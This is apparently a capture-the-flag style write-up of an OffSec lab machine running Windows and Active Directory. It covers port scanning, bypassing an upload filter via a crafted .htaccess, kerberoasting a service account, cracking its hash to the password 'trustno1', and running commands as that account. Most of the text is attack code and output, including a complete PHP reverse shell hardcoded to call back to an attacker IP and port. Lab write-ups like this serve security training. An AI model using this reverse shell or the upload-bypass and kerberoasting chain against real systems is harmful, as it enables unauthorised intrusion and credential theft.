$ sudo nmap -sCV -Pn -p- --min-rate 10000 192.168.160.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 09:40 +08
Nmap scan report for 192.168.160.187
Host is up (0.0097s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-30 01:41:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-30T01:41:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.48 seconds
Initial Access
Enum4linux
Anonymous
Guest
Port 80
There is a website that is running on port 80.
After enumerating for a while, we can see that when we try to buy tickets we are able to upload an image. So I tried to use some sample image file and random email to purchase the ticket.
After we click Purchase, we can see this message. However this does not give us much information.
Directory Enumeration
However, after running our directory enumeration, we can see 3 different places that we are able to access but the more important ones are forms and uploads.
If we go forms, we can see that this server supports PHP.
If we try to click into it, we are able to see this message.
If we go uploads, we can see that the image file is uploaded here.
If we try to click into it, we are able to see the image.
So we will try to upload php files, however after trying all the extensions we are not able to upload any php files.
The .htaccess file has this feature where we are able to execute php files using other extension. Since all the usual extensions are blocked, we shall try this method instead. First we need to create our own .htaccess file.
Next, we will convert our payload to use .dork extension.
In our payload, we will use this
First, we need to upload our own .htaccess file first.
Ensure that the Show Hidden Files checkbox is ticked, if not we are not able to see the .htaccess file.
Next, we will upload the payload.
We will then go the upload folder and should be able to see the revshell.dork. After we clicked it, we should be able to see the reverse shell appearing.
Lateral movement
Kerberoasting
We can see that there are 2 account which can be Kerberoasted.
We will then use Rubeus.exe to get the hashes and transfer them using impacket-smbserver.
After transfering out, we will be cracking the hash and the password is trustno1.
Runas to get reverse shell
We will use this module to make use of the run command.
$ enum4linux -a 192.168.160.187
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu May 30 09:45:39 2024
=========================================( Target Information )=========================================
Target ........... 192.168.160.187
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.160.187 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.160.187 )==============================
Looking up status of 192.168.160.187
No reply from 192.168.160.187
==================================( Session Check on 192.168.160.187 )==================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
$ enum4linux -a -u 'guest' -p '' 192.168.160.187
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu May 30 09:47:03 2024
=========================================( Target Information )=========================================
Target ........... 192.168.160.187
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.160.187 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.160.187 )==============================
Looking up status of 192.168.160.187
No reply from 192.168.160.187
==================================( Session Check on 192.168.160.187 )==================================
[E] Server doesn't allow session using username 'guest', password ''. Aborting remainder of tests.
<?php
// Copyright (c) 2020 Ivan Sincek
// v2.3
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
class Shell {
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(
0 => array('pipe', 'r'), // shell can read from STDIN
1 => array('pipe', 'w'), // shell can write to STDOUT
2 => array('pipe', 'w') // shell can write to STDERR
);
private $buffer = 1024; // read/write buffer size
private $clen = 0; // command length
private $error = false; // stream read/write error
public function __construct($addr, $port) {
$this->addr = $addr;
$this->port = $port;
}
private function detect() {
$detected = true;
if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
$this->os = 'LINUX';
$this->shell = '/bin/sh';
} else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
$this->os = 'WINDOWS';
$this->shell = 'cmd.exe';
} else {
$detected = false;
echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
}
return $detected;
}
private function daemonize() {
$exit = false;
if (!function_exists('pcntl_fork')) {
echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
} else if (($pid = @pcntl_fork()) < 0) {
echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
} else if ($pid > 0) {
$exit = true;
echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
} else if (posix_setsid() < 0) {
// once daemonized you will actually no longer see the script's dump
echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
} else {
echo "DAEMONIZE: Completed successfully!\n";
}
return $exit;
}
private function settings() {
@error_reporting(0);
@set_time_limit(0); // do not impose the script execution time limit
@umask(0); // set the file/directory permissions - 666 for files and 777 for directories
}
private function dump($data) {
$data = str_replace('<', '<', $data);
$data = str_replace('>', '>', $data);
echo $data;
}
private function read($stream, $name, $buffer) {
if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
}
return $data;
}
private function write($stream, $name, $data) {
if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
}
return $bytes;
}
// read/write method for non-blocking streams
private function rw($input, $output, $iname, $oname) {
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
$this->dump($data); // script's dump
}
}
// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
// we must read the exact byte length from a stream and not a single byte more
private function brw($input, $output, $iname, $oname) {
$fstat = fstat($input);
$size = $fstat['size'];
if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
// for some reason Windows OS pipes STDIN into STDOUT
// we do not like that
// we need to discard the data from the stream
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data); // script's dump
}
}
public function run() {
if ($this->detect() && !$this->daemonize()) {
$this->settings();
// ----- SOCKET BEGIN -----
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if (!$socket) {
echo "SOC_ERROR: {$errno}: {$errstr}\n";
} else {
stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
// ----- SHELL BEGIN -----
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if (!$process) {
echo "PROC_ERROR: Cannot start the shell\n";
} else {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
}
// ----- WORK BEGIN -----
$status = proc_get_status($process);
@fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
do {
$status = proc_get_status($process);
if (feof($socket)) { // check for end-of-file on SOCKET
echo "SOC_ERROR: Shell connection has been terminated\n"; break;
} else if (feof($pipes[1]) || !$status['running']) { // check for end-of-file on STDOUT or if process is still running
echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
} // use proc_get_status() instead
$streams = array(
'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
'write' => null,
'except' => null
);
$num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
if ($num_changed_streams === false) {
echo "STRM_ERROR: stream_select() failed\n"; break;
} else if ($num_changed_streams > 0) {
if ($this->os === 'LINUX') {
if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
} else if ($this->os === 'WINDOWS') {
// order is important
if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
}
}
} while (!$this->error);
// ------ WORK END ------
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
// ------ SHELL END ------
fclose($socket);
}
// ------ SOCKET END ------
}
}
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('192.168.45.175', 4444);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>
$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
[sudo] password for ranay:
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
...
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$670b261eaf9c9e9a04f26cb73d775af8$0601be4b237496bad279744a2d87af549d2f3d11c1a0cd6c0f5ed6e1b15504af2616127c23f5e997dece7cfddfd25e9090eafb2649d0578998406aef9e935f5c06823fb719af79b659129e94d98a5e770197298973b5c03dded9a226df9cdeceed285424e0d70202d32c7ce478f0a5bf419e44849afebe1f5cf35b8a253ceaf01034f41497d5ff885644d3f4c16296fedfd6847ebf9807cf6c9584afd9a7c118eff2d8379c95afa952c455cb70e82af242d76c58621d1b6aa3009dccba9a8c85801ad0428489c17c026fa605acfecbc6b51cd0a8eb1338ac97c838f7bb35d088468f73435bb71e0a67dfb2985b351b41bb582e515f6c0a24d4279d660de880a252a47d7775a6fda6caca9e04d51befd217b27084a9a5e794e564be32ca9051a92697a194030dacae0a47f38df539e5e0a69b1628f35605eb26f0fcf1990b171b6d90bf2071f5aedd0d6ac4fd45e3373cb5a42b26daac7296f7e846156c61e18d4e5fc039d18cf838a636f4222f148c790f80ccf0018858cbd9f223febeec8f23d0d7ffc59d1694cd48f49caebe658b9ba75d0db364ce732abb594d128b93c333c2b84608611813e4511652be9b5201188a46044fa73af22ee9bd9a8e060d6bb5e10651efb8c9f64d9d85b63aa6c33916ba1aa69e623e30c32faa8a4d8c099844d9124b09a3f4036adab430bcbc05bd2ae4af964f050809418e1b4b7aaad179626609fda48430dc29356e0563bb45046d5e9e74450445d5b1ec820798844182764e53196c273b068bf7abb3449410ce5e811139cecb886df0eedaa7d7623409f16203d77a28c05a181334658e3c597345f2291a12143ecb66af6dcacfaf942dc9f7e143730ee375cb2e5ff1a232fdd5d1fc34a85853a3be5536ee2c9885e9778c6a9f0ebd211d3e0d8e1a91174b5c59a979313bf12e718c35a83c8b5627b39a0054703273828baf74754bb9173f5ce17c2161ffa7f31b917f2392a74d47ff2dab0d959197616288e03a954097944b9152b9cf3ae6c59ba1b20dcc697bc33ebd2422d6b3b35f7a9b10e408e274438578ae3075ca2af44ec3f4d539ba86e9a4a1eb95e26859a612252bb97e952054064318fbac9fe2a89c858813ed41ec6ecc67354810b28188760c6902a57dda531a5a99be05766f02c905d677aff4513cea1770519667e077ade8e6d5d1bb71b41a4200c2291fa6309b7838cd836e79358cd71e23e551cde684dd7bed0de88322fc783d88b64794f41a152b256c4024b0bf1b3ef282c45976538de9a3cd334d5f1fd958e912fbbaed42f1c02a9a4e2552cd5b6f9c26421fa7a69551f0f9c23d2bdb7fa5674d2ca23d3496088d44ff93dcf69d28bc13827a223b8fb3cf1e18bfd1dcf84033f32bdb8dd2d2bb228c27f24f64fa88fe88b80f3591eeda432385999019b0cee1073f10f6cf760a91190e1a919bc78fcb6bcead4e184cf532830f36f10708ab79dee8f3f5e4c865a606fbf738608cac4453653aaa910a04b57e6914ffc083997ad45d6679f22c31114c9c4db86a1ca67ba392bba0e7bd9e4a02360621a93dcef0b1f0b08d1d0a988f9fb619cef70049b2cd9511d07b4b4a9ef94a44c5629da1cf14:trustno1
...
PS C:\test> Invoke-RunasCs svc_mssql trustno1 "cmd /c whoami /all"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
USER INFORMATION
----------------
User Name SID
================ ============================================
access\svc_mssql S-1-5-21-537427935-490066102-1511301751-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\test>
